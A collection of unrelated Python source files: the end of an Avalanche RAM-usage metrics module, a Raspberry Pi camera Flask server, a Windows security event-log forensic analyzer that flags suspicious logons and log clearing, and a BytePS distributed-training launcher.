self._ram, reset_at, emit_at, mode)
def update(self, strategy):
self._ram.update()
class MinibatchMaxRAM(RAMPluginMetric):
"""
The Minibatch Max RAM metric.
This plugin metric only works at training time.
"""
def __init__(self, every=1):
"""
Creates an instance of the Minibatch Max RAM metric.
:param every: seconds between consecutive updates of the maximum RAM usage
"""
super(MinibatchMaxRAM, self).__init__(
every, reset_at='iteration', emit_at='iteration', mode='train')
def before_training(self, strategy: 'BaseStrategy') \
-> None:
super().before_training(strategy)
self._ram.start_thread()
def after_training(self, strategy: 'BaseStrategy') -> None:
super().after_training(strategy)
self._ram.stop_thread()
def __str__(self):
return "MaxRAMUsage_MB"
class EpochMaxRAM(RAMPluginMetric):
"""
The Epoch Max RAM metric.
This plugin metric only works at training time.
"""
def __init__(self, every=1):
"""
Creates an instance of the epoch Max RAM metric.
:param every: seconds between consecutive updates of the maximum RAM usage
"""
super(EpochMaxRAM, self).__init__(
every, reset_at='epoch', emit_at='epoch', mode='train')
def before_training(self, strategy: 'BaseStrategy') \
-> None:
super().before_training(strategy)
self._ram.start_thread()
def after_training(self, strategy: 'BaseStrategy') -> None:
super().after_training(strategy)
self._ram.stop_thread()
def __str__(self):
return "MaxRAMUsage_Epoch"
class ExperienceMaxRAM(RAMPluginMetric):
"""
The Experience Max RAM metric.
This plugin metric only works at eval time.
"""
def __init__(self, every=1):
"""
Creates an instance of the Experience Max RAM metric.
:param every: seconds between consecutive updates of the maximum RAM usage
"""
super(ExperienceMaxRAM, self).__init__(
every, reset_at='experience', emit_at='experience', mode='eval')
def before_eval(self, strategy: 'BaseStrategy') \
-> None:
super().before_eval(strategy)
self._ram.start_thread()
def after_eval(self, strategy: 'BaseStrategy') -> None:
super().after_eval(strategy)
self._ram.stop_thread()
def __str__(self):
return "MaxRAMUsage_Experience"
class StreamMaxRAM(RAMPluginMetric):
"""
The Stream Max RAM metric.
This plugin metric only works at eval time.
"""
def __init__(self, every=1):
"""
Creates an instance of the Stream Max RAM metric.
:param every: seconds between consecutive updates of the maximum RAM usage
"""
super(StreamMaxRAM, self).__init__(
every, reset_at='stream', emit_at='stream', mode='eval')
def before_eval(self, strategy) -> MetricResult:
super().before_eval(strategy)
self._ram.start_thread()
def after_eval(self, strategy: 'BaseStrategy') \
-> MetricResult:
packed = super().after_eval(strategy)
self._ram.stop_thread()
return packed
def __str__(self):
return "MaxRAMUsage_Stream"
def ram_usage_metrics(*, every=1, minibatch=False, epoch=False,
experience=False, stream=False) -> List[PluginMetric]:
"""
Helper method that can be used to obtain the desired set of
plugin metrics.
:param every: seconds between consecutive updates of the maximum RAM usage
:param minibatch: If True, will return a metric able to log the minibatch
max RAM usage.
:param epoch: If True, will return a metric able to log the epoch
max RAM usage.
:param experience: If True, will return a metric able to log the experience
max RAM usage.
:param stream: If True, will return a metric able to log the evaluation
max stream RAM usage.
:return: A list of plugin metrics.
"""
metrics = []
if minibatch:
metrics.append(MinibatchMaxRAM(every=every))
if epoch:
metrics.append(EpochMaxRAM(every=every))
if experience:
metrics.append(ExperienceMaxRAM(every=every))
if stream:
metrics.append(StreamMaxRAM(every=every))
return metrics
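# Usage sketch: the returned list is meant to be passed to an Avalanche
# EvaluationPlugin together with a logger (plugin import and logger choice
# are assumptions, not shown in this module):
#
#   from avalanche.training.plugins import EvaluationPlugin
#   eval_plugin = EvaluationPlugin(
#       *ram_usage_metrics(every=1, epoch=True, experience=True),
#       loggers=[...],
#   )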
__all__ = [
'MaxRAM',
'MinibatchMaxRAM',
'EpochMaxRAM',
'ExperienceMaxRAM',
'StreamMaxRAM',
'ram_usage_metrics'
]
|
camera_2.py
|
#!/usr/bin/env python3
from flask import Flask, send_file
from PIL import Image
import RPi.GPIO as GPIO
from time import sleep
from picamera import PiCamera
from queue import Queue
from threading import Thread
import requests
from time import time
from io import BytesIO
LED_PIN = 16 # Broadcom pin 23 (P1 pin 16)
queue = Queue()
camera = None
app = Flask(__name__)
def setup_pi():
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BOARD)
GPIO.setup(LED_PIN, GPIO.OUT) # LED pin set as output
GPIO.output(LED_PIN, GPIO.LOW)
def setup_camera():
camera = PiCamera()
camera.resolution = (3280, 2464)
camera.sharpness = 100
camera.awb_mode = "auto"
camera.image_effect = "colorbalance"
camera.image_effect_params = (256.0, 256.0, 256.0)
camera.saturation = -100
return camera
def send_image(queue):
while queue.get():
with capture() as stream:
requests.post(
"http://192.168.0.151:5000/send-picture",
files={"image": stream, "mimetype": "image/jpeg"},
)
def capture():
with BytesIO() as read_stream:
GPIO.output(LED_PIN, GPIO.HIGH)
sleep(2)
camera.capture(read_stream, "jpeg")
GPIO.output(LED_PIN, GPIO.LOW)
read_stream.seek(0)
image = Image.open(read_stream).rotate(90)
write_stream = BytesIO()
image.save(write_stream, "JPEG")
write_stream.seek(0)
return write_stream
@app.route("/get-picture", methods=["GET"])
def getPicture():
with capture() as stream:
return send_file(stream, mimetype="image/jpeg")
@app.route("/pir", methods=["GET"])
def pir_signal_handler():
queue.put(time())
return "200"
if __name__ == "__main__":
try:
setup_pi()
camera = setup_camera()
Thread(target=send_image, args=(queue,), daemon=True).start()
app.run(host="0.0.0.0", port=5000, debug=False)
finally:
camera.close()
GPIO.cleanup()
|
LogAnalyzeLogs.py
|
import threading
import re
import datetime
import LogAnalyzeDBOps as db
import Messages as MSG
logonID = '0x785E60E' # Admin actions
linkedLogonID = '0x78B8C4B' # Other actions
# logonID = '0x78B8C68' # Admin actions
# linkedLogonID = '0x78B8C4B' # Other actions
# logonID = '0x1E6C1F95' # Admin actions
# logonID = '0x7E94155' # Admin actions
# linkedLogonID = '0x1E6C1FFB' # Other actions
def analyzeLogs(storeName):
reportId = storeName + '_' + str(datetime.datetime.now()).replace(' ', '_') + '_' + str(logonID)
print('Start...')
print('1...')
getPolicyChangeEventStatus(storeName, reportId)
print('2...')
getWrongAccountPassword(storeName, reportId)
print('3...')
getAddAccountEventStatus(storeName, reportId)
print('4...')
getDelAccountEventStatus(storeName, reportId)
print('5...')
getEventLogsDeleteEvent(storeName, reportId)
print('6...')
getTryRunWithoutAccess(storeName, reportId)
print('7...')
fillInTheUnknowLogs(storeName, reportId)
print('8...')
getPrintDate(storeName, reportId)
print('Done...')
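# Usage sketch (store name taken from the commented-out driver near the end of
# this file): analyzeLogs('wintest') runs every analysis pass in sequence and
# writes the findings to the DB layer under a single reportId.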
def getForensicData(logData, whatData, howEventIdSeq, whyStmt):
# print(logData)
forensics = {
'who': '',
'fromwhere': '',
'when': '',
'what': whatData,
'how': howEventIdSeq,
'why': whyStmt
}
if logData == -1: return forensics
forensics['when'] = logData['TimeCreated']
# who
if logData['Message'].__contains__('New Logon'):
tmpNewLogOnData = str(logData['Message'])
tmpNewLogOnData = tmpNewLogOnData[tmpNewLogOnData.index('New Logon'):]
tmpNewLogOnDataSID = tmpNewLogOnData[tmpNewLogOnData.index('Security ID'):tmpNewLogOnData.index('\n', tmpNewLogOnData.index('Security ID'))]
tmpNewLogOnDataName = tmpNewLogOnData[tmpNewLogOnData.index('Account Name'):tmpNewLogOnData.index('\n', tmpNewLogOnData.index('Account Name'))]
tmpNewLogOnDataName = tmpNewLogOnDataName.replace('\t', '').replace('\n', '').replace('\r', '')
tmpNewLogOnDataSID = tmpNewLogOnDataSID.replace('\t', '').replace('\n', '').replace('\r', '')
forensics['who'] = tmpNewLogOnDataName + ' (' + tmpNewLogOnDataSID + ')'
else:
try:
tmpNewLogOnData = str(logData['Message'])
tmpNewLogOnData = tmpNewLogOnData[tmpNewLogOnData.index('Subject'):]
tmpNewLogOnDataSID = tmpNewLogOnData[tmpNewLogOnData.index('Security ID'):tmpNewLogOnData.index('\n', tmpNewLogOnData.index('Security ID'))]
tmpNewLogOnDataName = tmpNewLogOnData[tmpNewLogOnData.index('Account Name'):tmpNewLogOnData.index('\n', tmpNewLogOnData.index('Account Name'))]
tmpNewLogOnDataName = tmpNewLogOnDataName.replace('\t', '').replace('\n', '').replace('\r', '')
tmpNewLogOnDataSID = tmpNewLogOnDataSID.replace('\t', '').replace('\n', '').replace('\r', '')
forensics['who'] = tmpNewLogOnDataName + ' (' + tmpNewLogOnDataSID + ')'
except:
try:
tmpNewLogOnData = str(logData['Message'])
tmpNewLogOnData = tmpNewLogOnData[tmpNewLogOnData.index('Logon Account'):]
tmpNewLogOnDataSID = tmpNewLogOnData[tmpNewLogOnData.index('Logon Account'):tmpNewLogOnData.index('\n', tmpNewLogOnData.index('Logon Account'))]
tmpNewLogOnDataSID = tmpNewLogOnDataSID.replace('\t', '').replace('\n', '').replace('\r', '')
forensics['who'] = tmpNewLogOnDataSID
except: # Print Document owned by
tmpNewLogOnData = str(logData['Message'])
tmpNewLogOnData = tmpNewLogOnData[tmpNewLogOnData.index('Print Document owned by') + len('Print Document owned by'):].strip(' ')
userName = tmpNewLogOnData.split(' ')[0]
forensics['who'] = userName
# fromwhere
if logData['Message'].__contains__('Network Information'):
tmpNewLogOnData = str(logData['Message'])
tmpNewLogOnData = tmpNewLogOnData[tmpNewLogOnData.index('Network Information'):]
tmpNewLogOnDataSID = tmpNewLogOnData[tmpNewLogOnData.index('Network Address'):tmpNewLogOnData.index('\n', tmpNewLogOnData.index('Network Address'))]
tmpNewLogOnDataName = tmpNewLogOnData[tmpNewLogOnData.index('Port'):tmpNewLogOnData.index('\n', tmpNewLogOnData.index('Port'))]
tmpNewLogOnDataName = tmpNewLogOnDataName.replace('\t', '').replace('\n', '').replace('\r', '')
tmpNewLogOnDataSID = tmpNewLogOnDataSID.replace('\t', '').replace('\n', '').replace('\r', '')
forensics['fromwhere'] = tmpNewLogOnDataSID + ' :' + tmpNewLogOnDataName
elif logData['Message'].__contains__('Print Document owned by'): # Class Driver through port 192.168.0.19
tmpNewLogOnData = str(logData['Message'])
tmpNewLogOnData = tmpNewLogOnData[tmpNewLogOnData.index('Class Driver through port') + len('Class Driver through port'):].strip(' ').strip('.')
ip = tmpNewLogOnData.split(' ')[0]
forensics['fromwhere'] = ip
else:
forensics['fromwhere'] = 'localhost'
# for k in forensics:
# print(k, forensics[k])
return forensics
# When someone changes audit policy
def getPolicyChangeEventStatus(storeName, reportId):
res = db.getLogDataUsingQuery(storeName, 'Id', ["4719"])
for i in range(0, len(res)):
msg = res[i]['Message']
if msg.__contains__(logonID) or msg.__contains__(linkedLogonID): # insertReport(log, status, reportId, reportMsg)
accMsg = msg
accMsg = accMsg[accMsg.index('Account Name') + len('Account Name:'):accMsg.index('Account Domain')].replace('\t', '')
accMsg = accMsg[:len(accMsg)-2]
msg = msg[msg.index('Category'):].replace('\t', '')
db.insertReport(
res[i],
MSG.STATUS_SUSPICIOUS,
reportId,
(MSG.SUSP_POLICY_CHANGE % accMsg) + '\n' + str(msg),
getForensicData(res[i], "Policy Change", "4719", "Integrity Breach")
)
# When someone is getting the account password wrong
def getWrongAccountPassword(storeName, reportId):
cnt = 0
res = db.getLogDataUsingQuery(storeName, 'Id', ["4776", "4625"])
userName = {}
for i in range(0, len(res) - 1):
if res[i]['Id'] == "4776" and res[i+1]['Id'] == "4625":
# if res[i]['Id'] == 4625:
# cnt += 1
msg = res[i + 1]['Message']
msg = msg[msg.index('Account For Which Logon Failed'):msg.index('Failure Information:') - 3]
msg = msg.replace('\t', '').replace('\r', '')
msg = msg[msg.index('Account Name:') + len('Account Name:'):msg.index('\n', msg.index('Account Name:'))]
if msg not in userName.keys():
userName[msg] = 1
else:
userName[msg] = userName[msg] + 1
for usr in userName.keys():
if userName[usr] > 2:
for i in range(0, len(res)):
# if res[i]['Id'] == 4776 and res[i + 1]['Id'] == 4625 and res[i]['Message'].__contains__(usr) and res[i+1]['Message'].__contains__(usr):
if res[i]['Message'].__contains__(usr):
if res[i]['Id'] == "4625":
msg = res[i]['Message']
msg = msg[msg.index('Account For Which Logon Failed'):msg.index('Failure Information:') - 3]
msg = msg.replace('\t', '').replace('\r', '')
db.insertReport(
res[i],
MSG.STATUS_THREAT,
reportId,
(MSG.THRT_WRONG_PASSWD_LOGIN) + '\n' + str(msg),
getForensicData(res[i], "Logon Failure", "4776;4625", "Breach of Availability.")
)
else:
db.insertReport(res[i], MSG.STATUS_THREAT, reportId, (MSG.THRT_WRONG_PASSWD_LOGIN) + '\n' + str(res[i]['Message']), getForensicData(res[i], "Logon Failure", "4776;4625", "Breach of Availability."))
else:
i = 0
for i in range(0, len(res)):
# if res[i]['Id'] == 4776 and res[i + 1]['Id'] == 4625 and res[i]['Message'].__contains__(usr) and res[i+1]['Message'].__contains__(usr):
if res[i]['Message'].__contains__(usr):
if res[i]['Id'] == "4625":
msg = res[i]['Message']
msg = msg[msg.index('Account For Which Logon Failed'):msg.index('Failure Information:') - 3]
msg = msg.replace('\t', '').replace('\r', '')
db.insertReport(res[i], MSG.STATUS_SUSPICIOUS, reportId, (MSG.THRT_WRONG_PASSWD_LOGIN) + '\n' + str(msg), getForensicData(res[i], "Logon Failure", "4776;4625", "Confidentiality"))
else:
db.insertReport(res[i], MSG.STATUS_SUSPICIOUS, reportId, (MSG.THRT_WRONG_PASSWD_LOGIN) + '\n' + str(res[i]['Message']), getForensicData(res[i], "Logon Failure", "4776;4625", "Confidentiality"))
# When someone created a new account in a workstation
def getAddAccountEventStatus(storeName, reportId):
res = db.getLogDataUsingQuery(storeName, 'Id', ["4793", "4728", "4720", "4722"])
res = res[::-1]
for i in range(0, len(res), 4): # (4793, 4728, 4720, 4722)
if res[i]['Id'] == "4793" and res[i+1]['Id'] == "4728" and res[i+2]['Id'] == "4720" and res[i+3]['Id'] == "4722":
if res[i]['Message'].__contains__(logonID) and res[i+1]['Message'].__contains__(logonID) and \
res[i+2]['Message'].__contains__(logonID) and res[i+3]['Message'].__contains__(logonID):
adminAccMsg = res[i]['Message']
adminAccName = adminAccMsg[adminAccMsg.index('Account Name:') + len('Account Name:'):adminAccMsg.\
index('\n', adminAccMsg.index('Account Name:'))].replace('\t', '').replace('\r', '')
desktopName = adminAccMsg[adminAccMsg.index('Caller Workstation:') + len('Caller Workstation:'):adminAccMsg.\
index('\n', adminAccMsg.index('Caller Workstation:'))].replace('\t', '').replace('\r', '')
newUserMsg = res[i+2]['Message']
newUserName = newUserMsg[newUserMsg.index('New Account'):].replace('\t', '').replace('\r', '')
newUserName = newUserName[newUserName.index('Account Name:'):newUserName.index('Attributes')].strip('\n')
db.insertReport(res[i], MSG.STATUS_SUSPICIOUS, reportId,
(MSG.SUSP_NEW_ACCOUNT_CREATED % (newUserName, adminAccName, desktopName)), getForensicData(res[i], "Add New Account", "4793;4728;4720;4722", "Confidentiality"))
db.insertReport(res[i+1], MSG.STATUS_SUSPICIOUS, reportId,
(MSG.SUSP_NEW_ACCOUNT_CREATED % (newUserName, adminAccName, desktopName)), getForensicData(res[i+1], "Add New Account", "4793;4728;4720;4722", "Confidentiality"))
db.insertReport(res[i+2], MSG.STATUS_SUSPICIOUS, reportId,
(MSG.SUSP_NEW_ACCOUNT_CREATED % (newUserName, adminAccName, desktopName)), getForensicData(res[i+2], "Add New Account", "4793;4728;4720;4722", "Confidentiality"))
db.insertReport(res[i+3], MSG.STATUS_SUSPICIOUS, reportId,
(MSG.SUSP_NEW_ACCOUNT_CREATED % (newUserName, adminAccName, desktopName)), getForensicData(res[i+3], "Add New Account", "4793;4728;4720;4722", "Confidentiality"))
# When someone deletes a user account in a workstation
def getDelAccountEventStatus(storeName, reportId):
res = db.getLogDataUsingQuery(storeName, 'Id', ["4733", "4729", "4726"])
res = res[::-1]
accntRemoved = {}
for i in range(0, len(res)): # (4733, 4729, 4726)
if res[i]['Id'] == "4726":
msg = res[i]['Message']
msg = msg[msg.index('Target Account:') + len('Target Account:'):msg.index('Additional Information')]
msg = msg.replace('\t', '')
securityId = msg[msg.index('Security ID:') + len('Security ID:'):msg.index('\n', msg.index('Security ID:'))]
securityId = securityId.replace('\r', '')
accName = msg[msg.index('Account Name:') + len('Account Name:'):msg.index('\n', msg.index('Account Name:'))]
accName = accName.replace('\t', '').replace('\r', '')
accntRemoved[accName] = securityId
for acc in accntRemoved.keys():
for i in range(0, len(res)):
if res[i]['Message'].__contains__(accntRemoved[acc]) and res[i]['Message'].__contains__(logonID):
msg = res[i]['Message']
msg = msg[msg.index('Account Name:'):msg.index('Logon ID')].replace('\t', '').replace('\r', '')
msg = msg.replace('Account Domain', 'Workstation')
db.insertReport(res[i], MSG.STATUS_SUSPICIOUS, reportId, (MSG.SUSP_ACCOUNT_DELETED % (acc, msg)), getForensicData(res[i], "Delete User Account", "4733;4729;4726", "Confidentiality"))
# When someone deletes log events
def getEventLogsDeleteEvent(storeName, reportId):
res = db.getLogDataUsingQuery(storeName, 'Id', ['1102'])
res = res[::-1]
accntRemoved = {}
for i in range(0, len(res)):
msg = res[i]['Message']
msg = msg[msg.index('Account Name:'):msg.index('Logon ID:')].replace('\t', '').replace('\r', '').strip('\n')
# print(MSG.ATTCK_LOG_CLEAR % msg)
db.insertReport(res[i], MSG.STATUS_ATTACK, reportId, (MSG.ATTCK_LOG_CLEAR % msg), getForensicData(res[i], "Delete User Account", "1102", "Breach of Availability."))
# When someone tries to open/run a file without permission
def getTryRunWithoutAccess(storeName, reportId):
fileList = []
res = db.getFailedObjectAccessLogs(storeName)
for i in range(0, len(res)):
accName = ''
lid = ''
obj = ''
if res[i]['Id'] == "4656":
msg = res[i]['Message']
msg = msg[msg.index('Account Name:') + len('Account Name:'):].strip('\t')
accName = msg[:msg.index('\n')].replace('\t', '').replace('\r', '')
msg = msg[msg.index('Logon ID:') + len('Logon ID:'):].strip('\t')
lid = msg[:msg.index('\n')].replace('\t', '').replace('\r', '')
msg = msg[msg.index('Object Name:') + len('Object Name:'):].strip('\t')
obj = msg[:msg.index('\n')].replace('\t', '').replace('\r', '')
if obj.__contains__(':'):
if len(fileList) == 0:
fileList.append([accName, lid, obj, 1])
else:
there = False
for f in fileList:
if f[0] == accName and f[1] == lid and f[2] == obj:
cnt = f[3]
f[3] = cnt + 1
there = True
if not there:
fileList.append([accName, lid, obj, 1])
for f in fileList:
if f[3] > 6: # ['Subhamoy', '0xA437DA', 'G:\\task\\xyz_norights.txt', 54]
for i in range(0, len(res)):
if res[i]['Message'].__contains__(f[0]) and res[i]['Message'].__contains__(f[1]) and \
res[i]['Message'].__contains__(f[2]):
db.insertReport(res[i], MSG.STATUS_THREAT, reportId, MSG.THRT_UNWANTED_ACCESS_TRY % (f[0], f[2]), getForensicData(res[i], "Failure Unwanted Access Try Multiple", "4656;4656;4656;4656;4656;4656", "Confidentiality")) # log, status, reportId, reportMsg
else:
for i in range(0, len(res)):
if res[i]['Message'].__contains__(f[0]) and res[i]['Message'].__contains__(f[1]) and \
res[i]['Message'].__contains__(f[2]):
db.insertReport(res[i], MSG.STATUS_SUSPICIOUS, reportId, MSG.SUSP_UNWANTED_ACCESS_TRY % (f[0], f[2]), getForensicData(res[i], "Unwanted Access Try", "4656", "Confidentiality")) # log, status, reportId, reportMsg
logs = db.getSuccessObjectAccessLogs(storeName)
# print(fileList)
for i in range(0, len(res)):
msg = res[i]['Message']
for f in fileList: # ['Subhamoy', '0xA437DA', 'G:\\task\\xyz_norights.txt', 54]
if f[2].__contains__(':'):
if msg.__contains__(f[0]) and msg.__contains__(f[1]) and msg.__contains__(f[2]):
db.insertReport(res[i], MSG.STATUS_ATTACK, reportId, MSG.ATTCK_UNWANTED_ACCESS % (f[0], f[2]), getForensicData(res[i], "Success Unwanted Access Try Multiple", "4656", "Breach of Confidentiality"))
# db.insertReport(res[i], MSG.STATUS_ATTACK, reportId, (MSG.ATTCK_LOG_CLEAR % msg))
# When a document is printed
def getPrintDate(storeName, reportId):
res = db.getPrintLogs(storeName)
for i in range(0, len(res)):
db.insertReport(res[i], MSG.STATUS_SUSPICIOUS, reportId, 'Document was printed.', getForensicData(res[i], "Document Printed", "307", "Confidentiality"))
# Fill in the other logs in the log store currently not taken into consideration
def fillInTheUnknowLogs(storeName, reportId):
logids = db.getKnownLogIds(reportId)
logs = list(db.getLogDate(storeName)) # 241
x = min(len(logs), 100)
for i in range(0, x):
if logs[i]['_id'] in logids:
continue
db.insertReport(logs[i], MSG.STATUS_GEN, reportId, 'OK', getForensicData(-1, "", "", ""))
def getSessionIDs():
sesIds = []
data = db.getAllLogs('wintest')
for log in data:
securityId = ''
loginId = ''
if log['Message'].__contains__('Security ID'):
tmpMsgSID = log['Message']
tmpMsgSID = tmpMsgSID[tmpMsgSID.index('Security ID'):tmpMsgSID.index('\n', tmpMsgSID.index('Security ID'))]
securityId = tmpMsgSID.replace('\t', '').replace('\n', '').replace('\r', '')
if log['Message'].__contains__('Logon ID'):
tmpMsgLID = log['Message']
try:
tmpMsgLID = tmpMsgLID[tmpMsgLID.index('Logon ID'):tmpMsgLID.index('\n', tmpMsgLID.index('Logon ID'))]
except:
tmpMsgLID = tmpMsgLID[tmpMsgLID.index('Logon ID'):]
loginId = tmpMsgLID.replace('\t', '').replace('\n', '').replace('\r', '')
if loginId not in sesIds and len(securityId.split('-')) > 6:
print(str(log['TimeCreated']))
print(securityId)
print(loginId)
sesIds.append(loginId)
print('************************************')
print(len(sesIds))
# if __name__ == '__main__':
# analyzeLogs('wintest')
# # analyzeLogs('a2')
# # fillInTheUnknowLogs('home-log', 'home-log_2019-08-07_16:45:59.625541_0x1E6C1F95')
def getLoginSessions(storeName):
eventId = ["4648", "4624"]
res = db.getLogDataUsingQuery(storeName, 'Id', eventId)
sessionIDs = []
for i in range(0, len(res)):
msg = res[i]['Message']
try:
msg = msg[msg.index('New Logon:'):msg.index('Logon GUID')]
msg = msg[msg.index('Logon ID'):msg.index('Network Account Name')]
msg = re.split('\r', msg)
logonId = (msg[0]).strip('\n')
logonId = logonId[logonId.index('0x'):]
linkedLogonId = (msg[1]).strip('\n')
linkedLogonId = linkedLogonId[linkedLogonId.index('0x'):]
sessionIDs.append([logonId, linkedLogonId])
except:
continue
res = db.getLogDataUsingQuery(storeName, 'Id', ["4634"])
noOfCompleteSessions = 0
for ses in sessionIDs:
found = False
for i in range(0, len(res)):
msg = res[i]['Message']
if msg.__contains__(ses[0]) or msg.__contains__(ses[1]):
noOfCompleteSessions += 1
found = True
break
if found:
print(ses)
print(noOfCompleteSessions)
# def getSessions():
# db
# def jobGetAccessAttackStatus(storeName):
# # LoginSuccess, ObjectReadRequest-success/failure, ObjectReadAccess-success, Logoff-Success
# eventIDs = [4624]
# res = db.getLogDataUsingQuery(storeName, 'Id', eventIDs)
# sessionIds = []
# for r in res:
# if r['Id'] == 4624:
# msg = str(r['Message'])
# msg = msg[msg.index('New Logon'):msg.index('Process Information', msg.index('New Logon'))]
# msg = msg[msg.index('Logon ID'):msg.index('\n', msg.index('Logon ID'))]
# logonid = (re.split('\t', msg)[-1]).strip('\r')
# if logonid not in sessionIds:
# sessionIds.append(logonid)
# threads = []
# print(sessionIds)
# try:
# cnt = 0
# for ses in sessionIds:
# if db.checkCompleteSessionStatus(storeName, ses):
# cnt += 1
# # t = threading.Thread(target=jobGetReadAttackStatus, name='Thread-Ses-' + str(ses), args=(storeName, ses,))
# # threads.append(t)
# except Exception:
# print('Exception :: jobGetAccessAttackStatus :: Making Thread')
#
# print(cnt)
#
# # try:
# # for i in range(0, len(threads)):
# # threads[i].start()
# #
# # for i in range(0, len(threads)):
# # threads[i].join()
# #
# # except Exception:
# # print('Exception :: jobGetAccessAttackStatus :: Run Thread')
#
#
# def jobGetReadAttackStatus(storeName, ses): # 0 - Regular, 1 - Threat, 2 - Attack
# eventIDs = [4624, 4656, 4663, 4647]
# reportId = storeName + '-' + str(datetime.datetime.now()) + '-' + str(ses)
# log = db.getLogsForAnalyze(storeName, ses, eventIDs)
# subLogInStatus = False
# for i in range(1, len(log)-1):
# if log[i]['Id'] == 4656 and log[i]['Keywords'] in [-9218868437227405312, -9218868437227400000]: # No access threat scenario
# if log[i+1]['Id'] != 4656: continue
# countEvt = 0
# objPrev = log[i]['Message']
# objPrev = objPrev[objPrev.index('Object Name') + 12:objPrev.index('\n', objPrev.index('Object Name'))].strip('\t')
# objNext = log[i]['Message']
# objNext = objNext[objNext.index('Object Name') + 12:objNext.index('\n', objNext.index('Object Name'))].strip('\t')
#
# if objPrev != objNext: continue
# sameObjName = 0
# for j in range(i, i+6):
# try:
# objName = log[j]['Message']
# objName = objName[objName.index('Object Name') + 12:objName.index('\n', objName.index('Object Name'))].strip('\t')
# if objPrev == objName: sameObjName += 1
# # print(objName)
# except:
# continue
# if sameObjName == 6:
# for j in range(i, i + 6):
# objName = log[j]['Message']
# objName = objName[objName.index('Object Name') + 12:objName.index('\n', objName.index('Object Name'))].strip('\t')
# userName = log[j]['Message']
# userName = userName[userName.index('Account Name')+13:userName.index('\n', userName.index('Account Name'))].strip('\t')
# userName = str(userName).strip('\r')
# # TODO :: Uncomment Later
# db.insertReport(log[j], 1, reportId, 'Threat: User %s tried to access object %s' % (userName, objName))
# i = i + 6
# elif log[i]['Id'] == 4656 and log[i]['Keywords'] in [-9214364837600034816, -9214364837600030000]: # success access threat scenario
# if log[i+1]['Id'] in [4663, 4656]:
# continue
# else:
# if log[i+1]['Id'] == 4624 and log[i+1]['Keywords'] in [-9214364837600034816, -9214364837600030000]: # Success Admin Login
# subSessionId = log[i+1]['Message']
# subSessionId = subSessionId[subSessionId.index('New Logon:'):subSessionId.index('Linked Logon ID', subSessionId.index('New Logon:'))].strip('\t')
# subSessionId = str(subSessionId).strip('\r')
# subSessionId = re.split('\n', subSessionId)[::-1][1]
# subSessionId = subSessionId.strip('\r').strip('\t')
# subSessionId = re.split('\t', subSessionId)[-1]
# x = i+2
# xCnt = 0
# print('Session ID ', subSessionId)
#
# while log[x]['Id'] not in [4634, 4647]:
# if log[x]['Message'].__contains__('An attempt was made to access an object') and log[x]['Keywords'] in [-9214364837600034816, -9214364837600030000]:
# db.insertReport(log[x], 2, reportId, 'Attack')
# # print('LOL - ', log[x]['Id'])
# # print('LOL - %s' % str(log[x]['Message']))
# else:
# db.insertReport(log[i], 0, reportId, 'Log Clean')
#
# x = x + 1
#
# # print('-----------------')
# # print(log[i]['Message'])
# # print('-----------------')
# # print(log[i+1]['Message'])
# # print('**********************************************')
# elif log[i+1]['Id'] == 4624 and log[i+1]['Keywords'] in [-9218868437227405312, -9218868437227400000]: # Failure Admin Login
# db.insertReport(log[i], 1, reportId, 'Log Clean')
# # print(log[i+1]['Keywords'])
# else:
# # pass
# # TODO :: Uncomment Later
# db.insertReport(log[i], 0, reportId, 'Log Clean')
#
#
#
#
# def jobGetAccLoginAttackStatus(storeName):
# eventIDs = [4648, 4624, 4648]
# print('checking :: ', eventIDs)
#
# if __name__ == '__main__':
# # test()
# jobGetAccessAttackStatus('a2')
|
byteps-tmplauncher.py
|
#!/usr/bin/python
from __future__ import print_function
import os
import subprocess
import threading
import sys
import time
COMMON_REQUIRED_ENVS = ["DMLC_ROLE", "DMLC_NUM_WORKER", "DMLC_NUM_SERVER",
"DMLC_PS_ROOT_URI", "DMLC_PS_ROOT_PORT"]
WORKER_REQUIRED_ENVS = ["DMLC_WORKER_ID"]
def check_env():
assert "DMLC_ROLE" in os.environ and \
os.environ["DMLC_ROLE"].lower() in ["worker", "server", "scheduler"]
required_envs = COMMON_REQUIRED_ENVS
if os.environ["DMLC_ROLE"] == "worker":
assert "DMLC_NUM_WORKER" in os.environ
num_worker = int(os.environ["DMLC_NUM_WORKER"])
assert num_worker >= 1
if num_worker == 1:
required_envs = []
required_envs += WORKER_REQUIRED_ENVS
for env in required_envs:
if env not in os.environ:
print("The env " + env + " is missing")
os._exit(0)
def worker(local_rank, local_size, command):
my_env = os.environ.copy()
my_env["BYTEPS_LOCAL_RANK"] = str(local_rank)
my_env["BYTEPS_LOCAL_SIZE"] = str(local_size)
if int(os.getenv("BYTEPS_ENABLE_GDB", 0)):
if command.find("python") != 0:
command = "python " + command
command = "gdb -ex 'run' -ex 'bt' -batch --args " + command
if os.environ.get("BYTEPS_TRACE_ON", "") == "1":
print("\n!!!Enable profiling for WORKER_ID: %s and local_rank: %d!!!" % (os.environ.get("DMLC_WORKER_ID"), local_rank))
print("BYTEPS_TRACE_START_STEP: %s\tBYTEPS_TRACE_END_STEP: %s\t BYTEPS_TRACE_DIR: %s" % (os.environ.get("BYTEPS_TRACE_START_STEP", ""), os.environ.get("BYTEPS_TRACE_END_STEP", ""), os.environ.get("BYTEPS_TRACE_DIR", "")))
print("Command: %s\n" % command)
sys.stdout.flush()
trace_path = os.path.join(os.environ.get("BYTEPS_TRACE_DIR", "."), str(local_rank))
if not os.path.exists(trace_path):
os.makedirs(trace_path)
subprocess.check_call(command, env=my_env, stdout=sys.stdout, stderr=sys.stderr, shell=True)
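# Launch sketch (addresses, counts and the training script are illustrative);
# the DMLC_* variables below are exactly the ones validated by check_env():
#   DMLC_ROLE=worker DMLC_NUM_WORKER=2 DMLC_NUM_SERVER=1 \
#   DMLC_PS_ROOT_URI=10.0.0.1 DMLC_PS_ROOT_PORT=1234 DMLC_WORKER_ID=0 \
#   python byteps-tmplauncher.py python train.py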
if __name__ == "__main__":
print("BytePS launching " + os.environ["DMLC_ROLE"])
sys.stdout.flush()
check_env()
if os.environ["DMLC_ROLE"] == "worker":
if "NVIDIA_VISIBLE_DEVICES" in os.environ:
local_size = len(os.environ["NVIDIA_VISIBLE_DEVICES"].split(","))
else:
local_size = 1
t = [None] * local_size
for i in range(local_size):
command = ' '.join(sys.argv[1:])
t[i] = threading.Thread(target=worker, args=[i, local_size, command])
t[i].daemon = True
t[i].start()
for i in range(local_size):
t[i].join()
else:
import byteps.server
|
sandhyakal.py
|
'''
Description : Multithreading
Function Date : 14 Mar 2021
Function Author : Prasad Dangare
Input : Int
Output : Int
'''
import os
import threading
from time import sleep
